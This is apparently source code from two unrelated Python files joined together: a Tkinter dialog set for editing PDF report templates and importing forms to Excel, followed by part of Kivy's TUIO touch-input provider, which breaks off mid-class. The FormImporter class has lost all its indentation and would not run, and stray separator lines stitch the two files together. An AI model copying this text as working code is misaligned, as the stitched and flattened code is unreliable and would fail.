            expand = True
        )

        # Template list scrollbar
        rt_list_scroll = ttk.Scrollbar(template_area_fr)
        rt_list_scroll.pack(
            side = tk.RIGHT,
            fill = tk.Y
        )

        # Link scrollbar <--> list
        self.rt_list.configure(yscrollcommand=rt_list_scroll.set)
        rt_list_scroll.configure(command=self.rt_list.yview)

        #--------------------------------------------------------
        # Button group container frame
        buttons_fr = ttk.Frame(master_fr,
            padding=3)
        buttons_fr.pack(side = tk.RIGHT, fill=tk.Y)

        # Top button group container frame
        top_buttons_fr = ttk.Frame(buttons_fr)
        top_buttons_fr.pack(side = tk.TOP)

        x = ttk.Button(
            top_buttons_fr,
            text="Create New",
            command = self.ev_but_New
        )
        x.pack(fill=tk.X)
        x = ttk.Button(
            top_buttons_fr,
            text="Edit",
            command = self.ev_but_Edit
        )
        x.pack(fill=tk.X)
        x = ttk.Button(
            top_buttons_fr,
            text="Copy",
            command = self.ev_but_Copy
        )
        x.pack(fill=tk.X)
        x = ttk.Button(
            top_buttons_fr,
            text="Delete",
            command = self.ev_but_Delete
        )
        x.pack(fill=tk.X)

        #--------------------------------------------------------
        # Global layout
        # window is not allowed to be any smaller than default
        self.tkWindow.update_idletasks() # Give Tk a chance to update widgets and figure out the window size
        self.tkWindow.minsize(self.tkWindow.winfo_width(), self.tkWindow.winfo_height())

    #---------------------------------------------------------------
    # Helpers
    #---------------------------------------------------------------
    def set_desc_text(self, str):
        """Replace the contents of the read-only description box.

        Note: the parameter name shadows the builtin ``str``; kept
        unchanged for backward compatibility with existing callers.
        """
        # Temporarily enable the widget so it can be modified.
        self.txt_desc.configure(state=tk.NORMAL)
        self.txt_desc.delete(0.0, tk.END)
        self.txt_desc.insert(tk.END, str)
        self.txt_desc.configure(state=tk.DISABLED)

    def set_ev_selection(self, idx):
        """Select list item *idx* (clamped to the list end) and show its
        description.  Clears the description if the list is empty."""
        if(len(self.templates) == 0):
            # No templates left!
            self.set_desc_text("")
            return
        elif(idx >= len(self.templates)):
            idx = len(self.templates) - 1

        self.rt_list.selection_clear(0,tk.END)
        self.rt_list.selection_set(idx)
        self.rt_list.see(idx)
        self.set_desc_text(self.templates[idx].description)

    #---------------------------------------------------------------
    # Events
    #---------------------------------------------------------------
    def __init__(self, parent, templates):
        """
        :param parent: parent Tk widget
        :param templates: list of ReportTemplate objects (mutated in place)
        """
        self.templates = templates
        self.selected_template = None # dialog result

        title = "Select Report Template"
        tkext.Dialog.__init__(self, parent, title)

    def dlg_initialize(self):
        """Populate the listbox and preselect the first template."""
        for T in self.templates:
            self.rt_list.insert(tk.END, T.name)

        # preselect something
        self.set_ev_selection(0)

    def ev_rt_list_Select(self, ev):
        """List selection changed: refresh the description box."""
        idx = self.rt_list.curselection()
        if(len(idx)):
            idx = int(idx[0])
            self.set_desc_text(self.templates[idx].description)

    def ev_rt_list_DoubleClick(self, ev):
        """Double-click acts like pressing OK."""
        self.dlg_pbOK()

    def ev_but_New(self):
        """Create a new template from a user-chosen PDF and open the editor."""
        options = {}
        options['defaultextension'] = '.pdf'
        options['filetypes'] = [('PDF file', '.pdf')]
        options['title'] = 'Select a Template PDF'
        filename = filedialog.askopenfilename(**options)
        if(not filename):
            return

        try:
            T = report_template.ReportTemplate.from_pdf(filename)
        except ValueError:
            # from_pdf() signals an unparseable PDF with ValueError
            messagebox.showerror(
                title = "New Report Template",
                message = "Selected file is not a valid PDF."
            )
            return

        # Initialized. Jump into the editor
        TE = TemplateEditor(self.tkWindow, T, "New Report Template")
        if(TE.result):
            # Template created. Insert edited template into the list & the GUI
            self.templates.append(TE.T)
            self.rt_list.insert(tk.END, TE.T.name)
            self.set_ev_selection(len(self.templates)-1)

    def ev_but_Edit(self):
        """Open the editor for the selected template."""
        idx = self.rt_list.curselection()
        if(len(idx)):
            idx = int(idx[0])
            TE = TemplateEditor(self.tkWindow, self.templates[idx], "Edit Report Template")
            if(TE.result):
                # edited. replace with edited instance
                self.templates[idx] = TE.T
                self.rt_list.delete(idx)
                self.rt_list.insert(idx, self.templates[idx].name)
                self.set_ev_selection(idx)

    def ev_but_Copy(self):
        """Duplicate the selected template under a unique '<name> (copy N)' name."""
        idx = self.rt_list.curselection()
        if(len(idx)):
            idx = int(idx[0])
            C = copy.deepcopy(self.templates[idx])

            # remove any trailing " (copy ##)"
            # (raw string: \s and \d are regex escapes, not string escapes)
            C.name = re.sub(r"\s\(copy(?: \d+)?\)$", "", C.name)

            # Augment the copy's name so that it is unique
            newname = C.name + " (copy)"
            n = 0
            while(True):
                for t in self.templates:
                    if(t.name == newname):
                        n = n + 1
                        newname = C.name + " (copy %d)" % n
                        break
                else:
                    # no collision found: newname is unique
                    break
            C.name = newname
            self.templates.insert(idx+1, C)
            self.rt_list.insert(idx+1, C.name)
            self.set_ev_selection(idx+1)

    def ev_but_Delete(self):
        """Delete the selected template after confirmation."""
        idx = self.rt_list.curselection()
        if(len(idx)):
            idx = int(idx[0])
            res = messagebox.askyesno(
                title = "Delete Report Template",
                icon = messagebox.WARNING,
                message = "Are you sure you want to delete '%s'?" % self.templates[idx].name
            )
            if(res):
                del self.templates[idx]
                self.rt_list.delete(idx)
                self.set_ev_selection(idx)

    def dlg_validate(self):
        """OK is only valid when a template is selected."""
        idx = self.rt_list.curselection()
        if(len(idx) == 0):
            messagebox.showerror(
                title = "Select Template",
                message = "You must select a template first."
            )
            return(False)
        return True

    def dlg_apply(self):
        """Record the selected template as the dialog result."""
        idx = self.rt_list.curselection()
        idx = int(idx[0])
        self.selected_template = self.templates[idx]
#===================================================================================================
class TemplateEditor(tkext.Dialog):
    """
    Dialog for editing a report template.

    Edits are performed on a deep copy (``self.T``); the caller inspects
    ``self.result`` and, if set, takes ``self.T`` as the edited template.
    """

    #---------------------------------------------------------------
    # Widgets
    #---------------------------------------------------------------
    def create_body(self, master_fr):
        """Lay out the tabbed notebook holding the editor pages."""
        tabs = ttk.Notebook(master_fr)
        tabs.pack(fill=tk.BOTH, expand=True)

        # One page object per tab; each manages its own widgets.
        self.tab_General = TE_tab_General(self.T, tabs)
        self.tab_ReportEntries = TE_tab_ReportEntries(self.T, tabs)

    #---------------------------------------------------------------
    # Dialog Events
    #---------------------------------------------------------------
    def __init__(self, parent, Template, title = None):
        # Work on a private copy so cancelling leaves the original untouched.
        self.T = copy.deepcopy(Template)
        tkext.Dialog.__init__(self, parent, title)

    def dlg_initialize(self):
        pass

    def dlg_validate(self):
        # Both tabs must validate; short-circuits exactly like the
        # sequential early-return form.
        return(self.tab_General.tab_validate()
               and self.tab_ReportEntries.tab_validate())

    def dlg_apply(self):
        self.tab_General.tab_apply()
        self.tab_ReportEntries.tab_apply()
class TE_tab_General:
    """'General' page of the template editor: template name + description."""

    def __init__(self, Template, tab_book):
        self.T = Template
        self.tab_book = tab_book
        # Index this page will occupy once added to the notebook.
        self.tab_index = tab_book.index(tk.END)
        self.create_widgets(tab_book)
        self.init_widgets()

    def show(self):
        """Bring this tab to the front."""
        self.tab_book.select(self.tab_index)

    def create_widgets(self, tab_book):
        """Construct the tab's widgets and add the page to the notebook."""
        tab_fr = ttk.Frame(tab_book, padding=5)
        tab_book.add(tab_fr, text="General")

        # Row 0 - Name
        lbl = ttk.Label(tab_fr, text="Template Name")
        lbl.grid(row=0, column=0, sticky=(tk.N, tk.E))
        self.txt_name = ttk.Entry(tab_fr)
        self.txt_name.grid(row=0, column=1, sticky=(tk.E, tk.W))

        # Row 1 - Description
        lbl = ttk.Label(tab_fr, text="Description")
        lbl.grid(row=1, column=0, sticky=(tk.N, tk.E))
        self.txt_desc = tk.Text(
            tab_fr,
            wrap = tk.WORD,
            width = 50,
            height = 5
        )
        self.txt_desc.grid(row=1, column=1, sticky=(tk.E, tk.W))

        # Entry column absorbs extra width; pad everything evenly.
        tab_fr.columnconfigure(1, weight=1)
        tab_fr.columnconfigure(tk.ALL, pad=5)
        tab_fr.rowconfigure(tk.ALL, pad=5)

    def init_widgets(self):
        """Populate the widgets from the template being edited."""
        self.txt_name.insert(tk.END, self.T.name)
        self.txt_desc.insert(tk.END, self.T.description)

    def tab_validate(self):
        """Reject an empty template name; return True when the tab is valid."""
        if(not self.txt_name.get()):
            messagebox.showerror(
                title = "Template Name",
                message = "Template name cannot be empty."
            )
            self.show()
            self.txt_name.focus_set()
            return(False)
        return(True)

    def tab_apply(self):
        """Copy the widget contents back onto the template object."""
        self.T.name = self.txt_name.get()
        # 'end-1c' drops the trailing newline that Text always appends.
        self.T.description = self.txt_desc.get("1.0",'end-1c')
class TE_tab_ReportEntries:
    """
    'Report Entries' page of the template editor.

    Left side: the ordered list of report entries with Add/Delete and
    Up/Down reorder buttons.  Right side: a settings pane for the
    selected entry, consisting of common settings (type, name) plus a
    type-specific widget group created by report_entries.CreateSettings.

    ``self.current_idx`` tracks which entry the settings pane currently
    reflects (None when nothing is selected), so that a pending name
    edit can be validated before the selection moves elsewhere.
    """

    def __init__(self, Template, tab_book):
        self.T = Template
        self.tab_book = tab_book
        # Index this page will occupy once added to the notebook.
        self.tab_index = tab_book.index(tk.END)

        # Container for type-specific entry settings
        self.entry_type_settings_frame = None
        self.entry_type_settings_widgets = None
        self.current_idx = None

        self.create_widgets(tab_book)
        self.init_widgets()

    def show(self):
        """Bring this tab to the front."""
        self.tab_book.select(self.tab_index)

    def create_widgets(self, tab_book):
        """Construct the tab's widgets and add the page to the notebook."""
        tab_fr = ttk.Frame(tab_book, padding=5)
        tab_book.add(tab_fr, text="Report Entries")

        entries_fr = ttk.Labelframe(
            tab_fr,
            text="Entries",
            padding=5
        )
        entries_fr.grid(row=0, column=0, sticky=(tk.N, tk.S, tk.E, tk.W))

        # Entry list and scrollbar
        entry_list_scroll = ttk.Scrollbar(entries_fr)
        entry_list_scroll.pack(
            side = tk.RIGHT,
            fill = tk.Y
        )
        self.entry_list = tk.Listbox(
            entries_fr,
            highlightthickness = 0,
            activestyle = "none",
            exportselection = False,
            selectmode = "single"
        )
        self.entry_list.bind('<<ListboxSelect>>', self.ev_entry_list_select)
        self.entry_list.pack(
            side = tk.RIGHT,
            fill = tk.BOTH,
            expand = True
        )
        # Link scrollbar <--> list
        self.entry_list.configure(yscrollcommand=entry_list_scroll.set)
        entry_list_scroll.configure(command=self.entry_list.yview)

        # Entry List side buttons
        ent_but_fr = ttk.Frame(entries_fr, padding=5)
        ent_but_fr.pack(
            side = tk.LEFT,
            fill = tk.Y,
            expand = True
        )
        x = ttk.Button(ent_but_fr,
            text="Add",
            command=self.pb_new_entry
        )
        x.pack(side = tk.TOP)
        x = ttk.Button(ent_but_fr,
            text="Delete",
            command=self.pb_delete_entry
        )
        x.pack(side = tk.TOP)
        x = ttk.Button(ent_but_fr,
            text="Down",
            command=self.pb_move_entry_down
        )
        x.pack(side = tk.BOTTOM)
        x = ttk.Button(ent_but_fr,
            text="Up",
            command=self.pb_move_entry_up
        )
        x.pack(side = tk.BOTTOM)

        # ------------- Entry Settings Section -------------
        self.entry_settings_frame = ttk.Labelframe(tab_fr,
            text="Entry Settings",
            padding=5
        )
        self.entry_settings_frame.grid(row=0, column=1, sticky=(tk.N, tk.S, tk.E, tk.W))

        # Common Settings
        ent_common_settings_fr = ttk.Frame(self.entry_settings_frame)
        ent_common_settings_fr.pack(side=tk.TOP, fill=tk.X)
        x = ttk.Label(ent_common_settings_fr, text="Entry Type")
        x.grid(row=0, column=0, sticky=(tk.N, tk.E))
        self.cmb_ent_type = ttk.Combobox(
            ent_common_settings_fr,
            state='readonly',
            values=report_entries.get_type_names()
        )
        self.cmb_ent_type.grid(row=0, column=1, sticky=(tk.N, tk.W, tk.E))
        self.cmb_ent_type.bind("<<ComboboxSelected>>", self.cmb_ent_type_Changed)
        x = ttk.Label(ent_common_settings_fr, text="Entry Name")
        x.grid(row=1, column=0, sticky=(tk.N, tk.E))
        # Name edits are validated when the entry loses focus; the same
        # callback is also invoked manually from ev_entry_list_select().
        self.txt_ent_name = ttk.Entry(
            ent_common_settings_fr,
            validatecommand=self.txt_ent_name_Changed,
            validate='focusout'
        )
        self.txt_ent_name.grid(row=1, column=1, sticky=(tk.N, tk.W, tk.E))
        ent_common_settings_fr.columnconfigure(1, weight=1)
        ent_common_settings_fr.columnconfigure(tk.ALL, pad=5)
        ent_common_settings_fr.rowconfigure(tk.ALL, pad=5)
        x = ttk.Separator(self.entry_settings_frame)
        x.pack(side=tk.TOP, fill=tk.X)

        # Type-Specific Settings
        self.entry_type_settings_frame = ttk.Frame(self.entry_settings_frame)
        self.entry_type_settings_frame.pack(side=tk.TOP, fill=tk.BOTH, expand=True)

        tab_fr.columnconfigure(1, weight=1)
        tab_fr.rowconfigure(tk.ALL, weight=1)

        # Hide settings by default (until something is selected)
        self.entry_settings_frame.grid_remove()

    def init_widgets(self):
        """Populate the entry list from the template."""
        # load entry list with names
        for e in self.T.entries:
            self.entry_list.insert(tk.END, e.name)

    def tab_validate(self):
        """This tab has nothing to validate at OK time."""
        return(True)

    # FYI: NOT the apply button, but the apply event when OKing the dialog window
    def tab_apply(self):
        # nothing to do here. fields are applied to self.T automatically
        pass

    #---------------------------------------------------------------
    # Helpers
    #---------------------------------------------------------------
    def set_entry_selection(self, idx):
        """Select entry *idx* (clamped to the list end) and rebuild the
        settings pane for it.  Hides the pane when the list is empty."""
        if(len(self.T.entries) == 0):
            # List is empty
            self.entry_settings_frame.grid_remove()
            self.entry_type_settings_widgets = None
            self.current_idx = None
            return
        elif(idx >= len(self.T.entries)):
            idx = len(self.T.entries) - 1

        self.entry_list.selection_clear(0,tk.END)
        self.entry_list.selection_set(idx)
        self.entry_list.see(idx)

        # set up common entry settings widgets
        self.cmb_ent_type.current(report_entries.get_type_idx(type(self.T.entries[idx])))
        self.txt_ent_name.delete(0, tk.END)
        self.txt_ent_name.insert(tk.END, self.T.entries[idx].name)

        # if previous type-specific entry settings are showing, remove them.
        if(self.entry_type_settings_widgets):
            self.entry_type_settings_widgets.destroy()

        # show new type-specific entry settings
        self.entry_type_settings_widgets = report_entries.CreateSettings(self.T.entries[idx], self.entry_type_settings_frame)
        self.current_idx = idx;

        # unhide settings region
        self.entry_settings_frame.grid()

    #---------------------------------------------------------------
    # Widget Events
    #---------------------------------------------------------------
    def ev_entry_list_select(self, ev):
        """Selection changed: validate any pending name edit first, then
        switch the settings pane to the newly selected entry."""
        idx = self.entry_list.curselection()
        if(len(idx)):
            idx = int(idx[0])

            # If a previous entry is showing, force the txt_ent_name changed event
            # since the event doesn't fire normally when this is clicked
            if(self.current_idx != None):
                # switch selection back to the previous idx
                self.entry_list.selection_clear(0,tk.END)
                self.entry_list.selection_set(self.current_idx)

                # force the "changed" dialog
                res = self.txt_ent_name_Changed()
                if(res == False):
                    # name invalid: stay on the previous entry
                    return

            self.set_entry_selection(idx)

    def pb_move_entry_up(self):
        """Move the selected entry one position earlier in the list."""
        idx = self.entry_list.curselection()
        if(len(idx) == 0):
            return
        idx = int(idx[0])
        if(idx <= 0):
            # already at the top
            return

        E = self.T.entries.pop(idx)
        self.entry_list.delete(idx)
        self.T.entries.insert(idx-1, E)
        self.entry_list.insert(idx-1, E.name)
        self.entry_list.selection_set(idx-1)
        self.current_idx = (idx-1)

    def pb_move_entry_down(self):
        """Move the selected entry one position later in the list."""
        idx = self.entry_list.curselection()
        if(len(idx) == 0):
            return
        idx = int(idx[0])
        if(idx >= len(self.T.entries)-1):
            # already at the bottom
            return

        E = self.T.entries.pop(idx)
        self.entry_list.delete(idx)
        self.T.entries.insert(idx+1, E)
        self.entry_list.insert(idx+1, E.name)
        self.entry_list.selection_set(idx+1)
        self.current_idx = (idx+1)

    def pb_new_entry(self):
        """Append a new default-typed entry with a unique name and select it."""
        # determine a unique name
        name = "New Entry"
        n = 0
        while(True):
            for e in self.T.entries:
                if(e.name == name):
                    n = n + 1
                    name = "New Entry %d" % n
                    break
            else:
                # no collision found: name is unique
                break

        # create new entry data object
        entry_t = report_entries.get_default_type()
        E = entry_t(self.T, name)

        # Add it to the template
        self.T.entries.append(E)

        # Add it to the GUI
        self.entry_list.insert(tk.END, E.name)

        # select it
        self.set_entry_selection(len(self.T.entries)-1)

    def pb_delete_entry(self):
        """Delete the selected entry from the template and the list."""
        idx = self.entry_list.curselection()
        if(len(idx)):
            idx = int(idx[0])
            del self.T.entries[idx]
            self.entry_list.delete(idx)
            self.set_entry_selection(idx)

    def txt_ent_name_Changed(self):
        """Validate and apply a name edit; returns False (keeping focus)
        when the name is empty or collides with another entry."""
        # NOTE(review): curselection() may yield the index as a str on some
        # Tk versions; it is compared against int i below -- TODO confirm.
        idx = self.entry_list.curselection()[0]
        new_name = self.txt_ent_name.get()

        # check if name is non-empty
        if(len(new_name) == 0):
            messagebox.showerror(
                title = "Entry Name",
                message = "Entry name cannot be empty."
            )
            self.txt_ent_name.focus_set()
            return(False)

        # check if name is unique
        for i,e in enumerate(self.T.entries):
            if(i != idx):
                if(e.name == new_name):
                    messagebox.showerror(
                        title = "Entry Name",
                        message = "Entry name must be unique"
                    )
                    self.txt_ent_name.focus_set()
                    return(False)

        # apply the new name to the data object and refresh the list row
        self.T.entries[idx].name = new_name
        self.entry_list.delete(idx)
        self.entry_list.insert(idx, self.T.entries[idx].name)
        self.entry_list.selection_set(idx)
        return(True)

    def cmb_ent_type_Changed(self,ev):
        """Entry type changed: rebuild the entry as the new type, keeping
        only its name, and redraw the settings pane."""
        type_idx = self.cmb_ent_type.current()
        entry_idx = self.entry_list.curselection()[0]

        # create new entry data object. preserve the name
        entry_t = report_entries.get_type(type_idx)
        name = self.T.entries[entry_idx].name
        E = entry_t(self.T, name)

        # replace old entry data object
        self.T.entries[entry_idx] = E

        # force redraw of the settings
        self.set_entry_selection(entry_idx)
#===================================================================================================
class FormImporter(tk.Tk):
#---------------------------------------------------------------
# Widgets
#---------------------------------------------------------------
def create_widgets(self):
self.title("Import Forms: %s" % self.T.name)
#--------------------------------------------------------
# File List
file_list_fr = ttk.Frame(
self,
padding=3
)
file_list_fr.pack(
side = tk.TOP,
fill=tk.BOTH,
expand = True
)
self.file_list = tk.Listbox(
file_list_fr,
highlightthickness = 0,
selectmode = "single",
exportselection = False,
activestyle = "none",
width = 100,
height = 20
)
self.file_list.bind('<<ListboxSelect>>', self.ev_file_list_Select)
self.file_list.pack(
side = tk.LEFT,
fill = tk.BOTH,
expand = True
)
# scrollbar
file_list_scroll = ttk.Scrollbar(file_list_fr)
file_list_scroll.pack(
side = tk.RIGHT,
fill = tk.Y
)
# Link scrollbar <--> list
self.file_list.configure(yscrollcommand=file_list_scroll.set)
file_list_scroll.configure(command=self.file_list.yview)
#--------------------------------------------------------
# Bottom Buttons
bottom_buttons_fr = ttk.Frame(
self,
padding=3
)
bottom_buttons_fr.pack(
side = tk.TOP,
fill=tk.BOTH
)
x = ttk.Button(
bottom_buttons_fr,
text="Import PDFs",
command = self.ev_but_import
)
x.pack(side=tk.LEFT)
x = ttk.Button(
bottom_buttons_fr,
text="Import Folder of PDFs",
command = self.ev_but_import_dir
)
x.pack(side=tk.LEFT)
x = ttk.Button(
bottom_buttons_fr,
text="Remove",
command = self.ev_but_remove
)
x.pack(side=tk.LEFT)
x = ttk.Button(
bottom_buttons_fr,
text="Export to Excel",
command = self.ev_but_export
)
x.pack(side=tk.RIGHT)
# window is not allowed to be any smaller than default
self.update_idletasks() #Give Tk a chance to update widgets and figure out the window size
self.minsize(self.winfo_width(), self.winfo_height())
#---------------------------------------------------------------
# Helpers
#---------------------------------------------------------------
def set_selection(self, idx):
if(len(self.Forms) == 0):
# List is empty
return
elif(idx >= len(self.Forms)):
idx = len(self.Forms) - 1
self.file_list.selection_clear(0,tk.END)
self.file_list.selection_set(idx)
self.file_list.see(idx)
def add_form(self, filename):
# check if it already exists
for f in self.Forms:
if(f.filename == filename):
return
log.info("Loading: %s" % filename)
F = form_data.FormData(filename)
self.Forms.append(F)
self.file_list.insert(tk.END, F.filename)
# Validate the form
if(F.valid):
if(self.T.is_matching_form(F) == False):
log.warning("Form fingerprint mismatch. Not valid: %s" % F.filename)
F.valid = False
if(not F.valid):
self.file_list.itemconfigure(tk.END, background="red")
def remove_form(self, idx):
if(len(self.Forms) == 0):
# List is empty
return
elif(idx >= len(self.Forms)):
return
del self.Forms[idx]
self.file_list.delete(idx)
self.set_selection(idx)
#---------------------------------------------------------------
# Events
#---------------------------------------------------------------
def __init__(self, parent, Template):
self.T = Template
self.Forms = []
tk.Tk.__init__(self, parent)
self.create_widgets()
def ev_file_list_Select(self, ev):
idx = self.file_list.curselection()
if(len(idx) == 0):
return
idx = int(idx[0])
def ev_but_import(self):
options = {}
options['defaultextension'] = '.pdf'
options['filetypes'] = [('PDF files', '.pdf')]
options['parent'] = self
options['title'] = 'Open...'
filenames = filedialog.askopenfilenames(**options)
if(not filenames):
return
# define a separate worker function to import the PDFs
def worker(dlg_if, filenames):
dlg_if.set_progress(0)
n_found = len(filenames)
n_done = 0;
for f in filenames:
dlg_if.set_status1("Processing files: %d/%d" % (n_done + 1, n_found))
dlg_if.set_status2(trim_path(f, 50))
dlg_if.set_progress(100*n_done/n_found)
if(dlg_if.stop_requested()):
return
f = os.path.abspath(f)
self.add_form(f)
# Start the job
args={'filenames':filenames}
x = tkext.ProgressBox(
job_func = worker,
job_data = args,
parent = self,
title = "Importing PDFs..."
)
self.set_selection(len(self.Forms)-1)
def ev_but_import_dir(self):
options = {}
options['mustexist'] = True
options['parent'] = self
options['title'] = 'Recursive Open'
dir = filedialog.askdirectory(**options)
if(not dir):
return
dir = os.path.abspath(dir)
# define a separate worker function to import the PDFs
def worker(dlg_if, start_dir):
dlg_if.set_progress(0)
dlg_if.set_status1("Gathering files...")
n_found = 0
matches = []
for root, dirnames, filenames in os.walk(dir):
if(dlg_if.stop_requested()):
return
for filename in fnmatch.filter(filenames, '*.pdf'):
matches.append(os.path.join(root, filename))
n_found = n_found + 1
dlg_if.set_status2("Found: %d" % n_found)
n_done = 0
for f in matches:
dlg_if.set_status1("Processing files: %d/%d" % (n_done + 1, n_found))
dlg_if.set_status2(trim_path(f, 50))
dlg_if.set_progress(100*n_done/n_found)
if(dlg_if.stop_requested()):
return
self.add_form(f)
n_done = n_done + 1
# Start the job
args={'start_dir':dir}
x = tkext.ProgressBox(
job_func = worker,
job_data = args,
parent = self,
title = "Importing PDFs..."
)
self.set_selection(len(self.Forms)-1)
def ev_but_remove(self):
idx = self.file_list.curselection()
if(len(idx)):
idx = int(idx[0])
self.remove_form(idx)
def ev_but_export(self):
options = {}
options['defaultextension'] = '.xlsx'
options['filetypes'] = [('Excel Workbook', '.xlsx'), ('Excel 97-2003 Workbook', '.xls')]
options['parent'] = self
options['title'] = 'Export as Excel...'
filename = filedialog.asksaveasfilename(**options)
if(not filename):
return
TBL = report_template.DataTable()
TBL.init_blank(self.T)
for form in self.Forms:
if(form.valid):
form_report = self.T.create_report(form)
TBL.append_row(form_report)
TBL.export_excel(filename)
|
|
'''
TUIO Input Provider
===================
TUIO is the de facto standard network protocol for the transmission of touch and
fiducial information between a server and a client.
To learn more about TUIO (which is itself based on the OSC protocol), please
refer to http://tuio.org -- The specification should be of special interest.
Configure a TUIO provider in the config.ini
-------------------------------------------
The TUIO provider can be configured in the configuration file in the
``[input]`` section::
[input]
# name = tuio,<ip>:<port>
multitouchtable = tuio,192.168.0.1:3333
Configure a TUIO provider in the App
------------------------------------
You must add the provider before your application is run, like this::
from kivy.app import App
from kivy.config import Config
class TestApp(App):
def build(self):
Config.set('input', 'multitouchscreen1', 'tuio,0.0.0.0:3333')
# You can also add a second TUIO listener
# Config.set('input', 'source2', 'tuio,0.0.0.0:3334')
# Then do the usual things
# ...
return
'''
__all__ = ('TuioMotionEventProvider', 'Tuio2dCurMotionEvent',
'Tuio2dObjMotionEvent')
from kivy.lib import osc
from collections import deque
from kivy.input.provider import MotionEventProvider
from kivy.input.factory import MotionEventFactory
from kivy.input.motionevent import MotionEvent
from kivy.input.shape import ShapeRect
from kivy.logger import Logger
class TuioMotionEventProvider(MotionEventProvider):
    '''The TUIO provider listens to a socket and handles some of the incoming
    OSC messages:
    * /tuio/2Dcur
    * /tuio/2Dobj
    You can easily extend the provider to handle new TUIO paths like so::
        # Create a class to handle the new TUIO type/path
        # Replace NEWPATH with the pathname you want to handle
        class TuioNEWPATHMotionEvent(MotionEvent):
            def __init__(self, id, args):
                super(TuioNEWPATHMotionEvent, self).__init__(id, args)
            def depack(self, args):
                # In this method, implement 'unpacking' for the received
                # arguments. You basically translate from TUIO args to Kivy
                # MotionEvent variables. If all you receive are x and y
                # values, you can do it like this:
                if len(args) == 2:
                    self.sx, self.sy = args
                    self.profile = ('pos', )
                    self.sy = 1 - self.sy
                super(TuioNEWPATHMotionEvent, self).depack(args)
        # Register it with the TUIO MotionEvent provider.
        # You obviously need to replace the PATH placeholders appropriately.
        TuioMotionEventProvider.register('/tuio/PATH', TuioNEWPATHMotionEvent)
    .. note::
        The class name is of no technical importance. Your class will be
        associated with the path that you pass to the ``register()``
        function. To keep things simple, you should name your class after the
        path that it handles, though.
    '''
    # Class-level map of OSC path -> MotionEvent subclass, shared by all
    # provider instances (see register()/unregister()).
    __handlers__ = {}
    def __init__(self, device, args):
        """Parse the 'ip:port' configuration string and set up state.

        On a malformed configuration the errors are logged and the instance
        is left without ip/port attributes (the early return below).
        """
        super(TuioMotionEventProvider, self).__init__(device, args)
        args = args.split(',')
        # NOTE(review): str.split always returns at least one element, so
        # this guard can never fire — dead code kept for reference.
        if len(args) <= 0:
            Logger.error('Tuio: Invalid configuration for TUIO provider')
            Logger.error('Tuio: Format must be ip:port (eg. 127.0.0.1:3333)')
            err = 'Tuio: Actual configuration is <%s>' % (str(','.join(args)))
            Logger.error(err)
            return None
        ipport = args[0].split(':')
        if len(ipport) != 2:
            Logger.error('Tuio: Invalid configuration for TUIO provider')
            Logger.error('Tuio: Format must be ip:port (eg. 127.0.0.1:3333)')
            err = 'Tuio: Actual configuration is <%s>' % (str(','.join(args)))
            Logger.error(err)
            return None
        self.ip, self.port = args[0].split(':')
        self.port = int(self.port)
        self.handlers = {}
        # OSC listener id, populated by start().
        self.oscid = None
        # Incoming OSC messages are queued here by the socket callback and
        # drained on the main thread in update().
        self.tuio_event_q = deque()
        # Per-path dict of currently-alive touches: {oscpath: {id: event}}.
        self.touches = {}
    @staticmethod
    def register(oscpath, classname):
        '''Register a new path to handle in TUIO provider'''
        TuioMotionEventProvider.__handlers__[oscpath] = classname
    @staticmethod
    def unregister(oscpath, classname):
        '''Unregister a path to stop handling it in the TUIO provider'''
        if oscpath in TuioMotionEventProvider.__handlers__:
            del TuioMotionEventProvider.__handlers__[oscpath]
    @staticmethod
    def create(oscpath, **kwargs):
        '''Create a touch event from a TUIO path'''
        if oscpath not in TuioMotionEventProvider.__handlers__:
            raise Exception('Unknown %s touch path' % oscpath)
        return TuioMotionEventProvider.__handlers__[oscpath](**kwargs)
    def start(self):
        '''Start the TUIO provider'''
        self.oscid = osc.listen(self.ip, self.port)
        # Subscribe the callback for every registered TUIO path.
        for oscpath in TuioMotionEventProvider.__handlers__:
            self.touches[oscpath] = {}
            osc.bind(self.oscid, self._osc_tuio_cb, oscpath)
    def stop(self):
        '''Stop the TUIO provider'''
        osc.dontListen(self.oscid)
    def update(self, dispatch_fn):
        '''Update the TUIO provider (pop events from the queue)'''
        # deque osc queue
        osc.readQueue(self.oscid)
        # read the Queue with event
        while True:
            try:
                value = self.tuio_event_q.pop()
            except IndexError:
                # queue is empty, we're done for now
                return
            self._update(dispatch_fn, value)
    def _osc_tuio_cb(self, *incoming):
        # Socket-side callback: appendleft here + pop (right) in update()
        # makes the queue FIFO, preserving message order.
        message = incoming[0]
        oscpath, types, args = message[0], message[1], message[2:]
        self.tuio_event_q.appendleft([oscpath, args, types])
    def _update(self, dispatch_fn, value):
        """Translate one queued TUIO message into begin/update/end events."""
        oscpath, args, types = value
        command = args[0]
        # verify commands
        if command not in ['alive', 'set']:
            return
        # move or create a new touch
        if command == 'set':
            id = args[1]
            if id not in self.touches[oscpath]:
                # new touch
                touch = TuioMotionEventProvider.__handlers__[oscpath](
                    self.device, id, args[2:])
                self.touches[oscpath][id] = touch
                dispatch_fn('begin', touch)
            else:
                # update a current touch
                touch = self.touches[oscpath][id]
                touch.move(args[2:])
                dispatch_fn('update', touch)
        # alive event, check for deleted touch
        if command == 'alive':
            alives = args[1:]
            to_delete = []
            for id in self.touches[oscpath]:
                if not id in alives:
                    # touch up
                    touch = self.touches[oscpath][id]
                    if not touch in to_delete:
                        to_delete.append(touch)
            # Dispatch 'end' outside the iteration so the dict is not
            # mutated while being traversed.
            for touch in to_delete:
                dispatch_fn('end', touch)
                del self.touches[oscpath][touch.id]
class TuioMotionEvent(MotionEvent):
    '''Abstraction for TUIO touches/fiducials.

    Depending on the tracking software you use (e.g. Movid, CCV, etc.) and
    its TUIO implementation, the TuioMotionEvent object can support multiple
    profiles such as:

    * Fiducial ID: profile name 'markerid', attribute ``.fid``
    * Position: profile name 'pos', attributes ``.x``, ``.y``
    * Angle: profile name 'angle', attribute ``.a``
    * Velocity vector: profile name 'mov', attributes ``.X``, ``.Y``
    * Rotation velocity: profile name 'rot', attribute ``.A``
    * Motion acceleration: profile name 'motacc', attribute ``.m``
    * Rotation acceleration: profile name 'rotacc', attribute ``.r``
    '''

    __attrs__ = ('a', 'b', 'c', 'X', 'Y', 'Z', 'A', 'B', 'C', 'm', 'r')

    def __init__(self, device, id, args):
        super(TuioMotionEvent, self).__init__(device, id, args)
        # Zero out every TUIO-specific attribute up front; depack() in the
        # subclasses fills in whatever the incoming message provides.
        for name in TuioMotionEvent.__attrs__:
            setattr(self, name, 0.0)

    # Read-only long-name aliases for the short TUIO attribute names.
    @property
    def angle(self):
        return self.a

    @property
